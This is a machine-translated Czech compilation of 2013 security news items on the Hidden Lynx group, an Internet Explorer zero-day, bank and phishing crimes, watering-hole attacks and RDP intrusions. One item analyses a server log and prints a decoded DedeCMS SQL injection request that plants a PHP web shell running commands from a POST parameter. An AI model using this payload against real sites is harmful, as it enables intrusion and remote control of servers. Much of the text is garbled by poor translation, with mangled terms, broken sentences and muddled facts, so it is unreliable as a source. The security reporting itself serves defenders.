Tato skupina není jen omezit na několika cílů, místo toho se zaměřuje na stovky různých organizací v mnoha různých oblastech, a to i současně. Vzhledem k šíři a množství cílů a zúčastněných regionů, usuzujeme, že tato skupina je s největší pravděpodobností profesionální hacker-pro-pronájem operace, které jsou smluvně klientům poskytovat informace. Kradou na vyžádání, bez ohledu na jejich klienti mají zájem, a proto je široká škála a rozsah cílů.

Věříme také, že k provádění útoků tohoto rozsahu, musí skupina mít značné odborné znalosti hacking má k dispozici, jsou asi 50 až 100 dělníků zaměstnaných a jsou uspořádány do nejméně dvou různých týmů, a to jak za úkol provádět různé činnosti s použitím různých nástrojů a technik . Tyto typy útoků vyžadují čas a úsilí, aby provedl některé z kampaní vyžaduje výzkum a inteligenční shromáždění před tím, než úspěšné útoky mohou být namontovány.

V přední linii této skupiny je tým, který používá jedno nástroje spolu se základními, ale účinné techniky k útoku na mnoho různých cílů. Mohou také působit jako zpravodajské kolektory taky. Tento tým říkáme Team Moudoor po názvem Trojan, které používají. Moudoor je zadní dveře Trojan, který používá tým štědře bez obav o odhalení ze strany bezpečnostních firem. Druhý tým funguje jako speciální zásahové jednotce, elitní personální použité rozlousknout nejcennější a nejtěžší cíle. Elitní tým používá trojského koně s názvem Naid a jsou proto označovány jako Team Naid. Na rozdíl od Moudoor je Naid Trojan používána střídmě a opatrně, aby se zabránilo odhalení a zachytit, jako tajnou zbraň, která se používá pouze v případě selhání není volba.

Od roku 2011 jsme pozorovali nejméně šest významných kampaní touto skupinou. Nejpozoruhodnější těchto kampaní je útok VOHO kampaň v červnu 2012. Co bylo zvláště zajímavé o tomto útoku bylo použití útoku zalévání otvorů techniky a ohrožení důvěryhodného Bit9 v souboru podpisu infrastruktury. Kampaň VOHO byl nakonec útoků na americké obranné dodavatelů, jejichž systémy byly chráněny založené na důvěře Bit9 v oblasti ochrany software, ale když bylo dosaženo skrytého Lynx útočníků blokován tuto překážku, ale znovu své možnosti a zjistil, že nejlepší způsob, jak kolem ochrany byla ohrožena Srdcem systému ochrany sám a rozvrátit ji pro své vlastní účely. To je přesně to, co udělal, když budou přesměrována svou pozornost na Bit9 a porušila jejich systémů. Po porušen, útočníci rychle našly cestu do souboru podpisu infrastruktury, která byla základem Bit9 ochranu modelu se pak používá tento systém, aby podepsali řadu malware souborů a pak tyto soubory byly použity v pořadí zkompromitovat skutečné určené cíle .

Pro zájemce o podrobnější informace, jsme publikovali podrobnou zprávu , která popisuje skupinu a útočné akce prováděné ně.

Také jsme dát dohromady infographic, která shrnuje nejdůležitější informace o tomto plodného Hidden Lynx skupiny.

E3292280-HiddenLynx-Infographic.png


Nový Internet Explorer Zero-day Nalezeno v cílených útoků

21.září 2013 Zranitelnosti | Hacking

17. září, Microsoft vydá certifikát Poradní Ohlášení nové zero-day zranitelnosti v aplikaci Internet Explorer: Microsoft Internet Explorer chyby zabezpečení poškození paměti (CVE-2013 až 3893). Doporučení uvádí, že zranitelnost může dojít k poškození paměti takovým způsobem, který by umožnil útočníkům spustit libovolný kód. Útok funguje lákavé uživatele k návštěvě speciálně vytvořené webové stránky, na jejichž území se chyby zabezpečení prostřednictvím aplikace Internet Explorer. Microsoft rovněž uvádí, že v této době je známo, že zranitelnost být využívány pouze v omezeném počtu cílených útoků.

Zatímco Microsoft je ještě vydat opravu této chyby, které již byly poskytnuty dočasné " Fix It "nástroj řešení jako řešení, dokud je tato aktualizace zabezpečení k dispozici. Aby Zákazníci Symantec jsou chráněny proti tomuto Internet Explorer zero-day, následující ochrana byla zavedena:

Antivirus

Bloodhound.Exploit.513
Intrusion Prevention System

Web útok: Microsoft Internet Explorer CVE-2013-3893
Web útok: MSIE poškození paměti CVE-2013-3893 3
Symantec bude i nadále vyšetřovat tento útok s cílem zajistit nejlepší možnou ochranu místě. Jako vždy doporučujeme, aby uživatelé zachovat jejich systémy up-to-data s nejnovějšími oprav softwaru a nezahájí žádné podezřelé e-maily. Rovněž doporučujeme zákazníkům využívat nejnovější technologie Symantec a začlenit nejnovější Symantec spotřebitelských a podnikových řešení, aby co nejlépe chránit před útoky tohoto druhu


Produkt Pokrytí a zmírnění jejich důsledků pro CVE-2013-3893

21.září 2013 Zranitelnosti | Hacking | Zabezpečení

Zpravodaj zabezpečení společnosti Microsoft (2887505)
17. září th , 2013, publikoval Microsoft Security Advisory 2887505, který coverers vzdálené spuštění kódu ve všech podporovaných verzích aplikace Microsoft Internet Explorer. Chyba spočívá v manipulaci s objekty v paměti, které byly odstraněny nebo nesprávně přidělena. Konkrétně může use-po-free chyba v HTML engine (aka mshtml.dll) být použity k vyvolání stavu ohrožení.
Tato chyba je v současné době využíván v omezených a cílené útoky. Funkční využití a malware artefakty byly identifikovány ve volné přírodě.
Sanace / Zmírnění
Microsoft
Společnost Microsoft vydala Fixit zástupného řešení k řešení tohoto problému. Kompletní oprava ještě není uvolněna.
Zdroje
http://technet.microsoft.com/en-us/security/advisory/2887505
http://blogs.technet.com/b/srd/archive/2013/09/17/cve-2013-3893-fix-it-workaround-available.aspx
McAfee Labs
Následující produkty McAfee / zabezpečují pokrytí
McAfee Vulnerability manažer
McAfee MVM / FSL Obsah Vydání 9/18/2013
McAfee Antivirus
Pokrytí je k dispozici v 7204 DAT, propuštěn na 9/20/2013
Jméno - Exploit-IE heur
McAfee Network Intrusion Prevention Systems (NIP)
UDS Nouzové odblokování v 9/17/2013
UDS podpis útok ID 0x4510ef00
Name = "UDS-HTTP: Microsoft Internet Explorer onlosecapture Použití po volném zabezpečení
Jako nové informace je možno získat, nebo produkt, pokrytí je aktualizován, společnost McAfee Labs vás informovat.


Stupeň ohrožení Žlutá: Ochrana doporučení týkající se aplikace Internet Explorer využije v přírodě

20. září 2013.Zranitelnosti | Hacking

Internet Storm Center začíná vidět více poznatků o zneužití ve volné přírodě o Microsoft Security Advisory 2887505 . V souladu s tím jdeme na InfoCon až žlutá.

Per poradenství:
Microsoft vyšetřuje veřejné zprávy o zranitelnosti ve všech podporovaných verzích aplikace Internet Explorer. Microsoft si je vědoma cílených útoků, které se pokoušejí zneužít tuto chybu zabezpečení v aplikaci Internet Explorer 8 a Internet Explorer 9. Aplikace Microsoft Fix IT řešení, CVE-2013-3893 Fix It Obejití , zabraňuje využívání tohoto problému. Toto řešení je i fixit Emet 4.0 pokynů. Jistě zvážit použití Emet 4,0 , kde můžete. Upozorňujeme, že opravy se zdá, že jen pomoci 32bitové verze prohlížečů. To znamená, že zranitelnost postihuje všechny verze aplikace Internet Explorer, s výjimkou případů systémů Windows Server 2008 a 2012 základních zařízení.

Zdá se, že exploit byl ve volné přírodě od 29.srpna 2013, kdy byl poprvé viděn jeden z on-line bezpečnostních skenerů. Tam je nějaký náznak, že weaponized exploit může být v širším oběhu, takže očekávat, že to rozjet rychle.

Vznikající hrozby má Snort podpisy pro tento problém: http://www.emergingthreats.net/2013/09/19/daily-ruleset-update-summary-09192013/ . Očekávejte rychlý 7 až pravděpodobných bitů vydání Metasploit v blízké budoucnosti. Budeme aktualizovat zde vidíme více informací o této chybě se objeví.


Osm zatčen více než 1.300.000 liber krádeží z Barclays Bank
20. září 2013. Hacking | Kriminalita
Osm mužů byli zatčeni policií Metropolitní ústředního e-Crime Unit (PZKO) v souvislosti s 1.300.000libra krádeží gangu, který ukradl peníze tím, že kontrolu pobočky Barclays Bank počítačového systému.

Hledá se v současné době provádí na adresy v Westminster, Newham Camden, Brent a Essexu, kde se nemovitost konfiskované, včetně hotovosti, šperků, léků, tisíce kreditních karet a osobních údajů. Jedna centrální Londýn prostor byl popsán detektivů jako "řízení" centra pro podvodníky pracovat z. Zatčení jsou výsledkem dlouhodobého zpravodajského operaci Metropolitní peću policie, ve spolupráci s Barclays Bank, kteří byli vyšetřování krádež 1.300.000libra od švýcarské chatě pobočky Barclays v dubnu 2013. Dne 5. dubna 2013 Barclays Security ohlásil ztrátu 1.300.000 liber z účtu na policii. Bylo zahájeno vyšetřování a hledání švýcarské chatě pobočky v severním Londýně byla provedena, v němž byl KVM přepínač připojený k 3G routeru našel připojena k jednomu z počítačů poboček. KVM přepínač je hardwarové zařízení používá oprávněně v podnikání umožňují uživatelům pracovat vzdáleně na svých systémech pracovním počítači. To umožňuje uživateli ovládat více počítačů z jednoho nebo více klávesnice, video monitoru a myši. I když více počítačů jsou připojeny k KVM, lze obvykle jeden nebo menší počet počítačů řídit v daném okamžiku. Později bylo zjištěno, že předchozí den male mely IT technik získal přístup k oboru, falešně uvádí tam byl na opravu počítače. On pak nasadili KVM zařízení. To umožnilo zločinecké skupiny vzdáleně převod finančních prostředků do předem zpět účty pod kontrolou zločinecké skupiny. Barclays byli schopni získat značné množství ukradených peněz. Tato nová a zvyšující se metodika by byl viděn prosazování práva Spojeného království ukazuje na rychle se vyvíjející povahu . nízkým rizikem, vysoká finanční výnos cyber povolen zločin inspektor Mark Raymond z PZKO Met řekl: "Tyto zatčení bylo dosaženo v partnerství s virtuální Task Force (VTF), jedinečná sdílení informací cyber spolupráce mezi PZKO a ve Velké Británii Bankovní sektor. "Osoby zodpovědné za tento trestný čin jsou významnými hráči v rámci sofistikovaného a odhodlaný organizované zločinecké sítě, která používá značné technické schopnosti a tradiční trestní know-how infiltrovat a využívat zabezpečené bankovní systémy."


Webové stránky firem z odvětví energetiky ohrožena zalévání děr útok
20. září 2013. Viry | Hacking | Zranitelnosti
Webové stránky téměř tucet firem z odvětví energetiky byly zneužity sloužit jako tzv. "zalévání děr", kde by se návštěvníci podávané s malware nebo které by mohly být přesměrovány na jiné webové stránky, kde je totéž by se stalo.

Podle Cisco výzkumníků, kteří sledovali útok od začátku května, mezi deseti webových stránek, které byly injekce s nebezpečným iframe použité v kampani, jedna patří k průzkumu ropy a zemního plynu firmy s operacemi v Africe, Maroku a Brazílie , jeden na rozvod plynu se nachází ve Francii, jeden fyzické stanice plynové elektrárny ve Velké Británii, a několik investičních a kapitálových firem, které se specializují na odvětví energetiky. Téměř polovina návštěvníků na těchto stránkách pocházejí z finančního a energetického sektoru. "Je zajímavé, že šest z deseti iframe vstřikováním webových stránek hostované na stejném serveru, zřejmě služby podle stejné firmy web design. Tři z těchto šesti byl rovněž ve vlastnictví téže mateřské společnosti," zdůraznil Cisco Emmanuel Tacheau. "To je pravděpodobně údaj lokality byly ohroženy prostřednictvím ukradených přihlašovací údaje, případně v důsledku infekce s konstrukční firmy nebo jejich poskytovatele hostingu." malware je umístěn na stránkách tří napadených internetových stránek ( keeleux.com , kenzhebek.com a nahoonservices.com ) a nainstalovat na počítače obětí útočníci mají pákový efekt, využít kód pro zranitelností ve starších verzích Javy, Internet Explorer a Firefox / Thunderbird. Tacheau neříká, zda je kampaň probíhá, ale ukázal na to, že jak čas plynul, útočníci modifikovali vstřikováním iframe, využívat kódu a servírované malware. "chrání uživatele před těmito útoky zahrnuje vedení stroje a webových prohlížečů plně patch, aby se minimalizovalo množství chyb zabezpečení, které útočník může zneužít," poukázal na to, s tím, že webový provoz filtrování řešení nasazeno na úrovni sítě může blokovat škodlivý obsah před tím, než může dosáhnout stroje určeného cíle.


Pole v žádostech, PHP a DedeCMS

20. září 2013. Hacking

Dostali jsme zajímavé podání o podivné hledá Apache web server log. Zatímco log nevypadá škodlivý, po přezkoumání pečlivě rozhodně vypadá divně, jak můžete vidět níže:

10.10.10.10 - [05/Sep/2013: 06:02:49 +0800] "GET [Snip] HTTP/1.1 "302 302" - "" Mozilla/4.0 (compatible; Win32, WinHttp.WinHttpRequest.5) "

Protokolu, jak je uvedeno níže, obsahuje požadavek na skript download.php PHP s partou parametrů, které se zdají být stejné. Po dekódování% 5B% 5D a na [a], žádost stává trochu více zřejmé:

/ A / download.php? Otevře = 1 & arrs1 [] = 99 & arrs1 [] = 102 & arrs1 [] = 103 & arrs1 [] = 95 & arrs1 [] = 100 & arrs1 [] = 98

Žádost obsahuje opakování výše arrs1 [] parametry - PHP zachází jako ty členy pole, takže to vlastně vytvoří pole s názvem arrs1 (a později arrs2, jak je uvedeno v původním protokolu), který obsahuje různé množství. Tato čísla (99, 102, 103 ...) vypadají jako ASCII kódování, takže dalším krokem k dekódování je tlačit přes perl jedné folie, která bude pracovat na původním protokolu:

$ Perl-pe 's / (& arrs (1 | 2)% 5B% 5D =) (\ d +) / CHR ($ 3) / GE' <original.log

10.10.10.10 - [05/Sep/2013: 06:02:49 +0800]? "GET / a / download.php otevřít = 1 cfg_dbprefixmytag `(pomoc, expbody, normbody) VALUES (9013, @` \ '` , '{Dede: php} file_put_contents ('' 90sec.php'','','' <php eval ($ _POST [guige])?>) {/ Dede: php}') # @ `\ ' ` HTTP/1.1 "302 302" - "" Mozilla/4.0 (compatible; Win32, WinHttp.WinHttpRequest.5) "

A to rozhodně vypadá škodlivé. Po trochou výzkumu se ukázalo, že se jedná o útok na známé zranitelnosti v DedeCMS, CMS napsaný v PHP, který se zdá být populární v Asii. Tento CMS má docela nepříjemný SQL injection zranitelnosti, které lze využít při žádosti je uvedeno výše.

Tato chyba zabezpečení existuje, protože CMS používá $ GLOBALS globální proměnnou, která je dále rozšířena do SQL dotazu. Výsledný dotaz od dekódované útoku nahoře, je docela zřejmé: útočník vytvoří soubor s názvem 90sec.php, který je velmi jednoduchý PHP shell backdoor, který umožňuje útočníkovi spustit libovolný příkaz s POST HTTP požadavku, který obsahuje příkaz k být provedeny v parametru s názvem guige (zvýrazněno).

Zatímco v tomto případě to bylo prostě způsob, jak převést pole přes GET, může podobný požadavek také zneužívat HTTP útoky parametrů znečištění, kde je jediný parametr, kdy několikrát do GET nebo POST požadavky, což potenciálně neočekávané chování.

Navíc, jak můžete vidět v logu na vrcholu, User Agent string byl nastaven na WinHttp.WinHttpRequest, což znamená, že tento požadavek byl vytvořen skript nebo nástroj útoku provedeného na stroji s Windows.


Mobilní Pwn2Own: $ 300k prize pool čeká úspěšné soutěžící
17. září 2013. Hacking
Další Mobile Pwn2own soutěž se bude konat v listopadu v bezpečnosti PacSec aplikované konferenci v Tokiu a soutěžící mohou vydělat až $ 100,000 úspěšné zneužití, HP ZDI manažer Brian Gorenc oznámila. Uvedená cena bude dána ven první, která ohrožuje baseband procesor některý z mobilních zařízení jsou k dispozici pro výběr, a menší věcné ceny půjdou k těm, které ohrožují:

Bluetooth, Wi-Fi, USB nebo NFC přes bezdrátové nebo kabelové útok ($ 50,000)
Mobile Web Browser (40.000 dolar + 10,000 dolarů od Google, pokud je prohlížeč Chrome na Android, a to buď na Google Nexus 4 nebo Samsung Galaxy S4)
Mobilní aplikace / operační systém (40.000 dolar)
Zprávy služby - SMS, MMS, nebo CMAS (70.000 dolar)
K dispozici bude jen jeden vítěz ve všech kategoriích s výjimkou mobilního webového prohlížeče jedno, kde Google se rozhodl nabídnout $ 10K pro všechny soutěžící, kteří úspěšně cíl Chrome na Android. "Buďte první, kdo ohrozit vybrané cíle v jedné z kategorií použití dříve neznámá zranitelnost (která nebyla zveřejněna na postižené dodavatele). Máte 30 minut na dokončení své pokusy. Když jste úspěšně předvedli své exploit a "pwned" cílové zařízení, budete muset poskytnout ZDI se plně funkční exploit a podrobnou zprávu popisující všechny chyby zabezpečení a technik používaných v útoku, "Gorenc vysvětlil . "Úspěšný útok proti těmto zařízením musí vyžadovat malou nebo žádnou interakci s uživatelem a počáteční chyba použitý v útoku musí být v evidenčním kategorii . Soutěžící musí prokázat vzdálené spuštění kódu vynecháním karantény (v případě potřeby) a exfiltrating citlivé informace, tiše volání na dlouhé vzdálenosti, nebo čísla, odposlouchávání hovorů. Aby nedošlo k rušení licencovaných dopravců sítí, musí být všechny RF útoky uskutečnit ve stanovené RF izolace skříně. Chyby používané v útoku musí být nepublikovaný 0-dní. " Více informací o soutěži a její pravidla mohou být pročtený zde .


Důkaz-založený systém zabezpečit auto

17 září 2013 Zabezpečení | Hacking

Digitální systémy v dnešním propojeném automobilu, včetně motoru, populárně naučné pořady a telematických systémů, zajišťují komunikaci, s pohodlím, informace, bezpečnost, údržba, bezpečnost a postupují směrem funkcí ovladače minimalistické a dokonce i zcela samostatně hnacích vozidel.

Množství dat generovaných rychle roste na podporu těchto funkcí. V kombinaci s integrovaným mobilním zařízením, GPS data a sociální profily, připojit auto se stává mocným sběratel a vysílání informací. Tato data jsou vysílána přes veřejné rozhlasové a televizní vysílání a uloženy v cloudu. Vzhledem k tomu, moderní připojen vůz má až 100 milionů řádků softwarového kódu, když jsou data více důležité pro provoz vozidla a připojeného vozu ekosystému, je důležité, aby se aktivní integritu ověření kritických systémů v reálném čase, přičemž vzájemná Auditovatelnost zajišťuje soukromí, ochranu, bezpečnost, legálnost a pojistitelnost. Základním problémem současných bezpečnostních modelů je, že je těžké zjistit (a následně dokázat), porušení událost, pokud na stěnu nebo klíče jsou ohroženy. S takovým útokem, je nemožné, aby byla zajištěna jejich spolehlivost, digitální aktiva, jak to může být změněn nebo přístupem neoprávněných osob (kteří pak zakryli stopy). Guardtime je Keyless podpis Infrastructure ( KSI ) je alternativní technologie pro ověřování elektronických dat . KSI se mění hru, s účinnou atestační založené na modelu zabezpečení, připojením složité matematické "značky" přímo do dat, což činí jakékoliv přístup k těmto údajům zdokumentovaná a ověřitelné události. čas, identita, autenticita a historické provenience data jsou chráněna a ověřeny v reálném čase pomocí Guardtime patentované "důkaz založený na" technologie, namísto ochrany poskytované administrátory nebo pověření, které mohou být kompromitována. Symphony Teleca (STC) a Guardtime oznámily partnerství, aby tyto nové ochrany, bezpečnosti , údržba, spolehlivost a schopnosti pro zvýšení Connected Car ekosystém. Mají vytvářet řešení s cílem zvýšit bezpečnost a spolehlivost připojeného životního cyklu vozu softwaru, ať už z prováděcích mechanismů, jako Over The Air (OTA), nebo přímo z údržby portálu. S hodnotou softwaru vozidel stanovených zvýšit až o 50 procent do roku 2020, je nezbytné pro OEM efektivně řídit jejich životní cyklus softwaru. Jak více a více dat prochází veřejné rozhlasové a televizní vysílání a stále bezpečné sítě umožňují nezabezpečené Mobilní zařízení připojit k jejich sítě, problematika integrity dat, Software Assurance a vzájemné ověřitelnost zůstává nezodpovězenou otázkou.


FBI potvrzuje, že byly za převzetí Freedom Hosting je

17 září 2013 Hacking | KyberSecurity

Agent FBI svědčit u soudního jednání, kde byla projednána předmětem kauci za svobodu vlastník Marques Hosting Eric Eoin potvrdil, že FBI, opravdu, měl ruku v převzetí hostitele serveru a nastavení stránky hostované na ně sloužit de- anonymity škodlivého softwaru návštěvníkům, Kabelové zprávy . je Freedom Hosting dobře známý pro umožnění stránky obsahující dětskou pornografii, která se má uskutečnit na svých serverech, a byl terčem útoků od Anonymous v roce 2011, ale mezi lokality je hostované byly také "dobré" služby jako je TorMail. Marques byl zatčen v Dublinu dne 4. srpna a ve stejný den všechny weby hostované Freedom Hosting začala slouží "kvůli údržbě" zpráva. Zatímco uživatelé spekuloval, on-line, co se děje, oni zpočátku nepodařilo zjistil, že spyware byl sloužil na některé z nich. Vědci analyzující kód šlo na stránkách potvrdila, že byl vytvořen s cílem zneužít zranitelnost ve Firefoxu. "Přestože se chyba týká uživatelů Firefox 21 a pod exploit se zaměřuje pouze ESR-17 uživatelům. Protože tento útok byl nalezen na Tor skrytých služeb podle všeho je to, že Tor Browser Bundle (TBB) je založena na Firefox ESR-17 ", Daniel Veditz, olovo bezpečnosti na Mozille , se domníval, v té době. sloužil malware má jeden jediný cíl - vyhledat oběti MAC adresu a hostname Windows a odeslat tyto informace na server ve Virginii provozuje FBI. Výzkumní pracovníci se domnívají, že je to FBI neslavný CIPAV (počítač a Internet Protocol Address Verifier) ​​spyware, který byl použit v předchozím dětské porno bodnutí operace. Zatímco svědčit před irského soudu, FBI dozorčí zvláštní agent Brooke Donahue neřekl, jak může předsednictvo se podařilo převzít Freedom Hosting serverů (pronajaté od obchodního francouzského poskytovatele hostingu), ale má společné, že Marques se podařilo krátce spustit ven a změňte hesla předtím, než konečně a definitivně uzamčení z nich sám. Agent řekl soudu, že Marques byl hledá do získávání ruské občanství, aby se mohl dostat mimo dosah prosazování práva Spojených států, že je stále v držení jeho vlastní cestovní pas a prokázal ochotu používat falešné Prodám web hosting prostoru od ruské společnosti, a to měl spoustu peněz, které má k dispozici -. všechny věci, které by dělat to pro něj jednodušší uniknout ze země, kdyby se být poskytnuta kauci Soudce zřejmě našel tyto argumenty přesvědčivé, a rozhodl, že Marques bude muset zůstat ve vazbě až do jeho vydání slyšení.


Remote Desktop ( RDP ) Hacking 101: Vidím svůj desktop od tady!

17 září 2013 Viry | Hacking | Zabezpečení

V poslední době jsme zaznamenali nárůst zpráv o malwaru instaloval přes Remote Desktop Protocol ( RDP ) . To je silný protokol, který byl nechat si zobrazit plochu systému Windows " na drát " na druhé straně zeměkoule (nebo zpět na své domů z kanceláře ) pro více než deset let . Je smutné, že zatímco RDP mohou sloužit řadu užitečných účelům od dálkového ovladače " hands-on " podporu konfigurace a provoz serverů , ve špatných rukou může býtdálkové ovládání zbraní, která umožňuje špatní herci na zombify počítač a nechte jej dělat jejich nabízení .

Jak se to mohlo stát? Pokud je váš počítač " naslouchá " pro signál RDP ( typicky přes portu TCP 3389 ) , a je připojen k internetu , bude reagovat, kdyžvzdálený uživatel požádá , pokud je to živé . Pro vzdálené uživatele , budou prezentovány s přihlašovací obrazovce na ploše, často bez povšimnutí vás ( zvláště pokud je počítač zapnutý a právě stalo, že se od ní ) . V tomto bodě, bude váš počítač vyzve je k zadání hesla - obvykle . Pokud máte špatně nakonfigurovaný RDP nastavení na vašem počítači však může jen nechat je dál -li tomu tak , je to jen začátek své problémy .

Co může PRV vetřelci dělat? Máte-li oprávnění správce přiřazené k uživateli se přihlásí as, mohou se počítač po neomezenou rotaci kolem bloku , a to od jeho vypnutí , restartování jej , instalace softwaru (včetně malwaru ) , nebo jen s rozhlédnout najít dokumenty souborů s vaší kritické osobních údajů v nich, jako je bankovnictví, účetnictví, nebo jiné informace a pak duch je pryč celé síti jejich domácích počítačích pro hanebné účely .

Jak se vám zastavit tohle všechno? První věc je vědět, jestli jste RDP povolen . To je snadné zkontrolovat z ovládacího panelu v části Systém > Vzdálená Nastavení> Připojení ke vzdálené ploše ( pod Windows 7 , ostatní operační systémy se liší ) .

Windows 7 RDP blokování

Všimněte si tento test má počítač Remote Desktop (RDP ), se zdravotním postižením, což je v pořádku pro testovací účely , protože nikdo by neměl být přihlášení vzdáleně tohoto rámečku. Ale pokud se rozhodnete povolit připojení nějaký čas trvat, definovat, kdo si myslíte, že by mělo být připojení pomocí " Vybrat uživatele ", dialogové okno :

RDP- uživatelé

Všimněte si , že jste uživatel přihlášen jako již nemá přístup ( zahalené v příkladu ) . Když vzdálenému útočníkovi přijde volání by to mohlo způsobit problémy pro bezděčná uživatele, který je přihlášen jako administrátor . Velmi pravděpodobně protivníci budou usilovat o získání zvýšené přístup a přihlášení jako správce jerychlý způsob, jak to udělat . Nemohou-li se pár, který je platný uživatel s snadný-k - uhodnout heslo , že mám klíče od počítače korunovačních klenotů .

V poslední době jsme zaznamenali nárůst počtu RDP - útoky pomocí trojského koně Win32/Filecoder.NAH (také známý jako ACCDFISA ), která se pokouší šifrovat soubory na vašem počítači a výpalné platit padouchy na jejich zpřístupnění .

Nevadí , že je to vždy dobrý nápad poslat peníze na podvodníky v systému , jako je tento (zejména prostřednictvím kreditní karty , který prakticky zaručuje další podvod ) , může celá věc se jednoduše vyhnout tuto službu , pokud nepotřebujete to a chránit jej , pokud nemáte .

Když už mluvíme o ochranu , kromě nepoužíváte snadno uhodnout jména uživatelů by silné heslo také jít dlouhé cesty směrem k ochraně účtu. Jestliže hackeři programově "odhadnout " vaše heslo, protože je založen na jednoduché slovo - , že budou poměrně rychle . Na druhou stranu, pokud je to složité , což znamená, kombinace malých a velkých písmen, číslic a symbolů ( čím déle , tím lépe) , jejich úkolem se stává mnohem více skličující.

Pokud potřebujete použít RDP a jsou více technicky nakloněn, můžete změnit port, na kterém RDP " naslouchá " pro připojení (výchozí port je 3389 ) . Microsoft má článek o tom, jak to v mnoha verzích systému Windows. Najdete zde také řadu možných řešení diskutovaných na přetečení zásobníku .

A na téma vzdálené plochy podporu , zůstat ve střehu, pro ty "Podpora systému Windows ", lidi, kteří telefon a zeptat se vás na instalaci speciálního software pro vzdálený přístup , aby mohli " opravit " počítač. Padající pro tento podvod může skončit špatně. Pro více informací o to, podívejte se na článek David Harley zde .

Příspěvek Remote Desktop ( RDP ) Hacking 101: Vidím svůj desktop od tady! se objevil na prvním místě Žijeme zabezpečení.


Náhlé - hat skenování může být nejbezpečnější klíče od auta všech dob

17 září 2013 Hacking | Zabezpečení

Náhlé skener může být použit jako konečný " biometrického klíče od auta ", podle výzkumníků na University Tottori - a dokonce zabránit carjackings , nelicencované ovladače užívající kolo, nebo nehod zaviněných řidiči s usínáním .

Biometrické systémy jsou široce projednávána v současné době , vzhledem k zahrnutí Apple systému otisků prstů číslo ve svém novém iPhone 5S .

Ale pro některé systémy , metody ověřování , jako jsou snímače oční duhovky a rozpoznávání otisku prstu jsou nedostatečné , Isao Nakanishi na Graduate School of Engineering uvádí v článku v časopise International Journal of biometrie .

Otisk prstu a duhovky systémy jsou "jednou a záznam " autentizace , Nakanishi tvrdí - a pro vozidla přepravující cenné komodity , nebo dokonce vozidel veřejné dopravy , nemusí to stačit .

"Měření řidičovy mozkové vlny stále - přes senzory v pokrývky hlavy u řidiče pokrývky hlavy - by bylo jednoduché a umožnilo ověření , které nemohly být spoofed podvodníka , " uvádí zpráva . "Pokud špatné mozkové vlny se měří , je vozidlo bezpečně zablokováno. "

Tento systém by snímat alfa- beta mozkové vlny řidiče , když jeli k enture , že jsou v dobré kondici , aby tak učinily .

" Důležité je, že by probíhající ověřování ovladačů, které používá své mozkové vlny usnadnit jednoduchý způsob, jak nezbavit spuštění motoru , pokud je řidič pod vlivem alkoholu s léky nebo alkoholem , nebo dokonce jen příliš unavený, protože jejich mozkové vlny se neshoduje s jejich normální vzor za takových okolností , " uvádí zpráva .

"Pokudpodvodník nahradí ověřeného uživatele v uneseného auta , například takové systémy nemají žádný způsob, jak ověřit , že osoba, v současné době jízdy auto je legitimní ovladače a že únosce nebyl hozen majitele z auta nebo přivázal v zavazadlovém prostoru . Systém ověřování na základě hesla nebo duhovky skenování , který opakovaně kontroluje , že řidič je právní řidič vozidla by neměla být v bezpečí. "

Jsme nedávno informoval o jiné biometrické, váš srdeční tep a podle Stephena Cobb , Senior Security výzkumník společnosti ESET , můžeme být na pokraji rozsáhlé nasazení biometrických údajů . Říká Cobb, " Úspěšné zavedení biometrických prvků v segmentu vedoucí výrobku může nevěstí nic dobrého pro spotřebitele přijetí . " Dodává: "Byl jsem fanouškem těchto údajů jako přidanou autentizační faktor od doby, kdy jsem poprvé zkoumal multi- faktoru a 2fa systémy 20 roků před však přijetí ze strany uživatelů je velmi citlivá na výkon , jinými slovy iPhone 5S mohli postoupit biometrii , nebo dát spoustu lidí mimo biometrie " .

Začátkem tohoto roku , UC Berkeley výzkumníci navrhli " mozkových vln " hesla by mohlo být efektivním nástrojem pro uvolnění počítačů a jiných počítačových systémů - s poruchovostí méně než 1%.

" Zjistili jsme, že mozkových signálů , dokonce i ty získané pomocí low-cost non- rušivé EEG senzory v každodenním prostředí , mohou být použity k autentizaci uživatelů s vysokou přesností ," řekl výzkumníci .

" Jiné než EEG snímač , headset je k nerozeznání od běžné Bluetooth headset pro použití s mobilními telefony , hudební přehrávače a jiných počítačových zařízení , " tvrdí vědci .

Po náhlé - hat skenování může být nejbezpečnější auto klíč někdy dělal poprvé objevil na Žijeme zabezpečení.


Vysněnou práci v luxusním obchodě? Ne - jen chytrý 1.500.000dolar phishing podvod

17 září 2013 Phishing | Hacking | Bezpečnost

Šest Nigerijské muži šli před soud dnes v Londýně za údajné phishingu , kde pracovních nabídek v exkluzivní londýnské obchodního domu Harrods byla použita jako " návnada " .

Celkempodvod , zmíněného jako " podvod" Gumtree kvůli místní síti pracovních nabídek slouží k vlečné sítě pro oběti , vsítil 1.500.000 dolary ,tvrdí obžaloba .

Muži šli na zkoušku na centrální londýnské čtvrti Starý dvůr Bailey dnes - obviněn z vyslání stovky falešné nabídky práce pro luxusní obchodní dům , a pak žádat , aby žadatelé stáhnout " přihlášku " z personální agentury , podle zprávy vDaily Mail .

Podvodníci pak nainstalovat trojského koně na počítačích svých obětí a ukradl částky v rozmezí od 400 liber na 4,700 liber . Obchod byl upozorněn, když žadatelé stěžovali, že jejich počítač byl infikován po podání žádosti o zaměstnání . Šest mužů obviněných z šíření malware jsou IT absolventů .

Walton Hornsby , trestní stíhání , řekl: " Je to specificky zaměřené lidi , kteří hledají práci. Bylo rozhodnuto, že někdo žádá o práci je možná zájem spolupracovat a dodržovat veškeré pokyny někoho, kdo se zdá být pozitivně reagovat na jejich uplatňování vyzve je ke stažení aplikace pack.In srpna a začátkem září 2010 číslo inzeráty objevila na reklamních míst Gumtree různých domu Harrods , poměrně atraktivní příspěvek . "

ESET výzkumný pracovník David Harley říká v post diskutovat jak rozpoznat falešné nabídky práce : "V době, kdy se globální ekonomika je v krizi , tam jsou všechny příliš mnoho lidí řešit své vlastní zaměstnání a finanční problémy tím, scammingnezaměstnaní a pracovní podvody jsouzřejmé způsob chytil jejich pozornost. "

Harley nabízí detailní tipy - včetně záchytných bodů , ve znění pracovních nabídek , které mohou prozradit skutečnost, že neexistuje žádná úloha v nabídce vůbec.


Největší belgický telekomunikační porušena NSA?
16. září 2013. KyberSecurity | Hacking
Belgacom, a to především ve vlastnictví státu a největší telekomunikační v Belgii, bylo oznámil , že jeho vnitřní IT systémy byly porušeny a napaden malware "neznámého třetí strany".

